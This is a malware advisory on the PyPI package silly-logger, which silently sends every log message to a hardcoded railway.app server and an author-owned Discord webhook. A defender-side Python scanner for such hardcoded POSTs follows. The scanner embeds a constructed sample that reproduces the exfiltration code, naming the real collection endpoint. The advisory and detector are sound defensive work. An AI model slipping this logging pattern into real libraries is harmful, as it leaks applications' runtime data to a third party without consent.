Malicious code in silly-logger (PyPI)
MAL-2026-4767
Published · Modified
Description
Source: amazon-inspector (a57b518b6dcdb16913e105cd371fe81d367a85f81599d4468819bbe77ccb68b8)
The package's advertised logging API (debug/info/warn/error/critical) unconditionally POSTs every log payload (message, level, category, and source) to a hardcoded endpoint at https://lain-log-server.up.railway.app/log (silly_logger/init.py line 6, line 56). On request failure it falls back to a hardcoded Discord webhook owned by the author (silly_logger/init.py line 7, line 84). The destination is not configurable and cannot be disabled by the caller; the README references a 'live dashboard' but does not disclose the fixed destination or the Discord fallback. Additionally, log.discord(webhook, content) (lines 155-160) accepts a caller-supplied webhook but, on any exception while delivering to it, transparently re-posts the same content to the author's fallback webhook, silently redirecting caller-chosen destinations to the author. Any application using this library as a logger will leak its log stream (which routinely contains error context, identifiers, and other sensitive runtime data) to author-controlled infrastructure.
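A defender-side static check for the pattern described above (a logging library that POSTs to hardcoded endpoints and, inside an except handler, silently falls back to another hardcoded webhook), added here as an example; it is not code from the package or from the advisory source. It parses Python source with the standard `ast` module; the embedded sample is constructed to mirror the description, the Discord webhook URL is a placeholder, and `hardcoded_posts`, `Finding` and `NETWORK_CALLS` are names chosen for this example.

```python
import ast
from dataclasses import dataclass
# Constructed sample mirroring the advisory's description, not the real package source; webhook URL is a placeholder.
SAMPLE_SOURCE = '''import requests
LOG_SERVER = "https://lain-log-server.up.railway.app/log"
FALLBACK = "https://discord.com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN"
def info(message, category="general", source="app"):
    payload = {"message": message, "level": "info", "category": category, "source": source}
    try:
        requests.post(LOG_SERVER, json=payload, timeout=5)
    except Exception:
        requests.post(FALLBACK, json={"content": str(payload)})
def discord(webhook, content):
    try:
        requests.post(webhook, json={"content": content})
    except Exception:
        requests.post(FALLBACK, json={"content": content})
'''
NETWORK_CALLS = {("requests", "post"), ("requests", "get"), ("httpx", "post")}
@dataclass
class Finding:
    line: int        # line in the scanned source
    url: str         # resolved hardcoded destination
    in_except: bool  # call sits inside an except handler: a silent fallback path
class _Scanner(ast.NodeVisitor):
    def __init__(self, consts):
        self.consts, self.depth, self.findings = consts, 0, []
    def visit_ExceptHandler(self, node):
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1
    def visit_Call(self, node):
        f = node.func
        if (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)
                and (f.value.id, f.attr) in NETWORK_CALLS and node.args):
            arg = node.args[0]  # the URL positional argument
            url = arg.value if isinstance(arg, ast.Constant) else (
                self.consts.get(arg.id) if isinstance(arg, ast.Name) else None)
            if isinstance(url, str) and url.startswith("http"):
                self.findings.append(Finding(node.lineno, url, self.depth > 0))
        self.generic_visit(node)
def hardcoded_posts(source):
    # Resolve module-level string constants so NAME arguments map back to URLs.
    tree = ast.parse(source)
    consts = {t.id: n.value.value for n in tree.body if isinstance(n, ast.Assign)
              and isinstance(n.value, ast.Constant) and isinstance(n.value.value, str)
              for t in n.targets if isinstance(t, ast.Name)}
    scanner = _Scanner(consts)
    scanner.visit(tree)
    return scanner.findings
```

Calls whose URL comes from a function parameter (the caller-supplied `webhook` in the sample) are deliberately not reported; only destinations fixed at module level are, and the `in_except` flag marks the fallback path the advisory describes.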
References